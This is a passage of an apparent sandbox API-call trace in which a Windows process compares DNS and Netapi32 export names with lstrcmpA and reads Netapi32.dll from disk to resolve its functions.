lpString2="AddRefQueryBlobEx") returned 1 [0190.649] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="BreakRecordsIntoBlob") returned 1 [0190.649] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="Coalesce_UpdateNetVersion") returned 1 [0190.650] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="CombineRecordsInBlob") returned 1 [0190.650] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DeRefQueryBlobEx") returned 1 [0190.650] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DelaySortDAServerlist") returned 1 [0190.650] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DnsAcquireContextHandle_A") returned 0 [0190.650] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0190.650] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0190.650] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AddRefQueryBlobEx") returned 1 [0190.650] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="BreakRecordsIntoBlob") returned 1 [0190.650] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="Coalesce_UpdateNetVersion") returned 1 [0190.650] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="CombineRecordsInBlob") returned 1 [0190.650] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DeRefQueryBlobEx") returned 1 [0190.650] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DelaySortDAServerlist") returned 1 [0190.650] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_A") returned 1 [0190.650] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_W") returned 0 [0190.650] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0190.650] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0190.650] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AddRefQueryBlobEx") returned 1 [0190.650] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="BreakRecordsIntoBlob") returned 1 [0190.650] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="Coalesce_UpdateNetVersion") returned 1 [0190.650] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="CombineRecordsInBlob") returned 1 [0190.650] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DeRefQueryBlobEx") returned 1 [0190.789] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DelaySortDAServerlist") returned 1 [0190.789] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_A") returned 1 [0190.789] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_W") returned 1 [0190.789] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAllocateRecord") returned 0 [0190.789] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0190.789] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0190.790] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AddRefQueryBlobEx") returned 1 [0190.790] lstrcmpA (lpString1="DnsApiAlloc", lpString2="BreakRecordsIntoBlob") returned 1 [0190.790] lstrcmpA (lpString1="DnsApiAlloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0190.790] lstrcmpA (lpString1="DnsApiAlloc", lpString2="CombineRecordsInBlob") returned 1 [0190.790] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DeRefQueryBlobEx") returned 1 [0190.790] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DelaySortDAServerlist") returned 1 [0190.790] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0190.790] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0190.790] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAllocateRecord") returned 1 [0190.790] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsApiAlloc") returned 0 [0190.790] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0190.790] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0190.790] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AddRefQueryBlobEx") returned 1 [0190.790] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="BreakRecordsIntoBlob") returned 1 [0190.791] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="Coalesce_UpdateNetVersion") returned 1 [0190.791] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="CombineRecordsInBlob") returned 1 [0190.791] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DeRefQueryBlobEx") returned 1 [0190.791] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DelaySortDAServerlist") returned 1 [0190.791] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_A") returned 1 [0190.791] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_W") returned 1 [0190.791] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAllocateRecord") returned 1 [0190.791] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAlloc") returned 1 [0190.791] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAllocZero") returned 0 [0190.791] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0190.791] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0190.791] lstrcmpA (lpString1="DnsApiFree", lpString2="AddRefQueryBlobEx") returned 1 [0190.791] lstrcmpA (lpString1="DnsApiFree", lpString2="BreakRecordsIntoBlob") returned 1 [0190.791] lstrcmpA (lpString1="DnsApiFree", lpString2="Coalesce_UpdateNetVersion") returned 1 [0190.791] lstrcmpA (lpString1="DnsApiFree", lpString2="CombineRecordsInBlob") returned 1 [0190.791] lstrcmpA (lpString1="DnsApiFree", lpString2="DeRefQueryBlobEx") returned 1 [0190.791] lstrcmpA (lpString1="DnsApiFree", lpString2="DelaySortDAServerlist") returned 1 [0190.791] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_A") returned 1 [0190.791] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_W") returned 1 [0190.791] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAllocateRecord") returned 1 [0190.791] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAlloc") returned 1 [0190.791] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAllocZero") returned 1 [0190.792] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiFree") returned 0 [0190.792] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0190.792] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0190.792] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AddRefQueryBlobEx") returned 1 [0190.792] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="BreakRecordsIntoBlob") returned 1 [0190.792] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="Coalesce_UpdateNetVersion") returned 1 [0190.792] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="CombineRecordsInBlob") returned 1 [0190.792] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DeRefQueryBlobEx") returned 1 [0190.792] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DelaySortDAServerlist") returned 1 [0190.792] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_A") returned 1 [0190.792] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_W") returned 1 [0190.792] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAllocateRecord") returned 1 [0190.792] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAlloc") returned 1 [0190.792] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAllocZero") returned 1 [0190.792] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiFree") returned 1 [0190.792] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiHeapReset") returned 0 [0190.792] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0190.792] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0190.792] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AddRefQueryBlobEx") returned 1 [0190.792] lstrcmpA (lpString1="DnsApiRealloc", lpString2="BreakRecordsIntoBlob") returned 1 [0190.793] lstrcmpA (lpString1="DnsApiRealloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0190.793] lstrcmpA (lpString1="DnsApiRealloc", lpString2="CombineRecordsInBlob") returned 1 [0190.793] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DeRefQueryBlobEx") returned 1 [0190.793] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DelaySortDAServerlist") returned 1 [0190.793] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0190.793] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0190.793] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAllocateRecord") returned 1 [0190.793] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAlloc") returned 1 [0190.793] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAllocZero") returned 1 [0190.793] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiFree") returned 1 [0190.793] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiHeapReset") returned 1 [0190.793] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiRealloc") returned 0 [0190.793] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0190.793] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0190.793] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AddRefQueryBlobEx") returned 1 [0190.793] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="BreakRecordsIntoBlob") returned 1 [0190.793] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="Coalesce_UpdateNetVersion") returned 1 [0190.793] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="CombineRecordsInBlob") returned 1 [0190.793] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DeRefQueryBlobEx") returned 1 [0190.793] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DelaySortDAServerlist") returned 1 [0190.793] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_A") returned 1 [0190.793] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_W") returned 1 [0190.793] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAllocateRecord") returned 1 [0190.793] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAlloc") returned 1 [0190.793] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAllocZero") returned 1 [0190.793] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiFree") returned 1 [0190.794] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiHeapReset") returned 1 [0190.794] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiRealloc") returned 1 [0190.794] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiSetDebugGlobals") returned 0 [0190.794] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0190.794] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0190.794] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0190.794] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0190.794] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0190.794] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="CombineRecordsInBlob") returned 1 [0190.794] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0190.794] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DelaySortDAServerlist") returned 1 [0190.794] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0190.794] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0190.794] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAllocateRecord") returned 1 [0190.794] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAlloc") returned 1 [0190.794] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAllocZero") returned 1 [0190.794] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiFree") returned 1 [0190.794] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiHeapReset") returned 1 [0190.794] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiRealloc") returned 1 [0190.794] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0190.794] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 0 [0190.794] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0190.794] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0190.794] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AddRefQueryBlobEx") returned 1 [0190.794] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="BreakRecordsIntoBlob") returned 1 [0190.794] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="Coalesce_UpdateNetVersion") returned 1 [0190.795] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="CombineRecordsInBlob") returned 1 [0190.795] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DeRefQueryBlobEx") returned 1 [0190.795] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DelaySortDAServerlist") returned 1 [0190.795] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_A") returned 1 [0190.795] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_W") returned 1 [0190.795] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAllocateRecord") returned 1 [0190.795] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAlloc") returned 1 [0190.795] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAllocZero") returned 1 [0190.795] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiFree") returned 1 [0190.795] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiHeapReset") returned 1 [0190.795] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiRealloc") returned 1 [0190.795] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiSetDebugGlobals") returned 1 [0190.795] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0190.795] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterInit") returned 0 [0190.795] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0190.795] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0190.795] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AddRefQueryBlobEx") returned 1 [0190.795] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="BreakRecordsIntoBlob") returned 1 [0190.795] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="Coalesce_UpdateNetVersion") returned 1 [0190.795] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="CombineRecordsInBlob") returned 1 [0190.795] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DeRefQueryBlobEx") returned 1 [0190.796] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DelaySortDAServerlist") returned 1 [0190.796] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_A") returned 1 [0190.796] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_W") returned 1 [0190.796] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAllocateRecord") returned 1 [0190.796] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAlloc") returned 1 [0190.796] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAllocZero") returned 1 [0190.796] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiFree") returned 1 [0190.796] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiHeapReset") returned 1 [0190.796] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiRealloc") returned 1 [0190.796] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiSetDebugGlobals") returned 1 [0190.796] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0190.796] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterInit") returned 1 [0190.796] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterTerm") returned 0 [0190.796] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0190.796] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0190.796] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AddRefQueryBlobEx") returned 1 [0190.796] lstrcmpA (lpString1="DnsCancelQuery", lpString2="BreakRecordsIntoBlob") returned 1 [0190.796] lstrcmpA (lpString1="DnsCancelQuery", lpString2="Coalesce_UpdateNetVersion") returned 1 [0190.796] lstrcmpA (lpString1="DnsCancelQuery", lpString2="CombineRecordsInBlob") returned 1 [0190.796] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DeRefQueryBlobEx") returned 1 [0190.796] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DelaySortDAServerlist") returned 1 [0190.796] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_A") returned 1 [0190.796] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_W") returned 1 [0190.796] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAllocateRecord") returned 1 [0190.797] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAlloc") returned 1 [0190.797] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAllocZero") returned 1 [0190.797] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiFree") returned 1 [0190.797] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiHeapReset") returned 1 [0190.797] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiRealloc") returned 1 [0190.797] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiSetDebugGlobals") returned 1 [0190.797] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0190.797] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterInit") returned 1 [0190.797] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterTerm") returned 1 [0190.797] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsCancelQuery") returned 0 [0190.797] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0190.797] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0190.797] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AddRefQueryBlobEx") returned 1 [0190.797] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="BreakRecordsIntoBlob") returned 1 [0190.797] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0190.797] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="CombineRecordsInBlob") returned 1 [0190.797] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DeRefQueryBlobEx") returned 1 [0190.797] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DelaySortDAServerlist") returned 1 [0190.797] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_A") returned 1 [0190.797] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_W") returned 1 [0190.797] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAllocateRecord") returned 1 [0190.797] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAlloc") returned 1 [0190.797] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAllocZero") returned 1 [0190.797] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiFree") returned 1 [0190.798] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiHeapReset") returned 1 [0190.798] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiRealloc") returned 1 [0190.798] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiSetDebugGlobals") returned 1 [0190.798] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0190.810] GetProcessHeap () returned 0x590000 [0190.811] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x3a3d010 | out: hHeap=0x590000) returned 1 [0190.811] GetProcessHeap () returned 0x590000 [0190.811] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a9080 [0190.811] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffc5cb30000 [0190.814] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0190.815] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0190.815] GetModuleFileNameA (in: hModule=0x7ffc5cb30000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0190.815] CreateFileA (lpFileName="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0190.816] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0190.816] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0190.816] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=80640) returned 1 [0190.816] GetProcessHeap () returned 0x590000 [0190.816] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13b00) returned 0x2d05030 [0190.816] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0190.816] ReadFile (in: hFile=0x17c, lpBuffer=0x2d05030, nNumberOfBytesToRead=0x13b00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d05030*, lpNumberOfBytesRead=0x14f5a4*=0x13b00, lpOverlapped=0x0) returned 1 [0190.817] CloseHandle (hObject=0x17c) returned 1 [0190.817] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavAddConnection") returned 1 [0190.817] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavDeleteConnection") returned 1 [0190.817] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavFlushFile") returned 1 [0190.817] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetExtendedError") returned 1 [0190.817] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetHTTPFromUNCPath") returned 1 [0190.817] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetUNCFromHTTPPath") returned 1 [0190.817] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesA") returned 1 [0190.817] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExA") returned 1 [0190.817] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExW") returned 1 [0190.817] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesW") returned 1 [0190.817] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0190.818] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0190.818] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsA") returned 1 [0190.818] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsW") returned 1 [0190.818] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcCloseW") returned 1 [0190.818] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameA") returned 1 [0190.818] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameW") returned 1 [0190.818] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountA") returned 1 [0190.818] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountW") returned 1 [0190.818] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextA") returned 1 [0190.818] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextW") returned 1 [0190.818] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenA") returned 1 [0190.818] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenW") returned 1 [0190.818] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageA") returned 1 [0190.818] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageW") returned 1 [0190.818] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetForestTrustInformationW") returned 1 [0190.818] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameA") returned 1 [0190.818] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameW") returned 1 [0190.818] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsMergeForestTrustInformationW") returned 1 [0190.818] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleFreeMemory") returned 1 [0190.818] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0190.818] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameA") returned 1 [0190.818] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameW") returned 1 [0190.819] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugCall") returned 1 [0190.819] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugTrace") returned 1 [0190.819] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0190.819] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryOtherDomains") returned 1 [0190.819] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryStatistics") returned 1 [0190.819] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetNetlogonState") returned 1 [0190.819] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetStatistics") returned 1 [0190.819] lstrcmpA 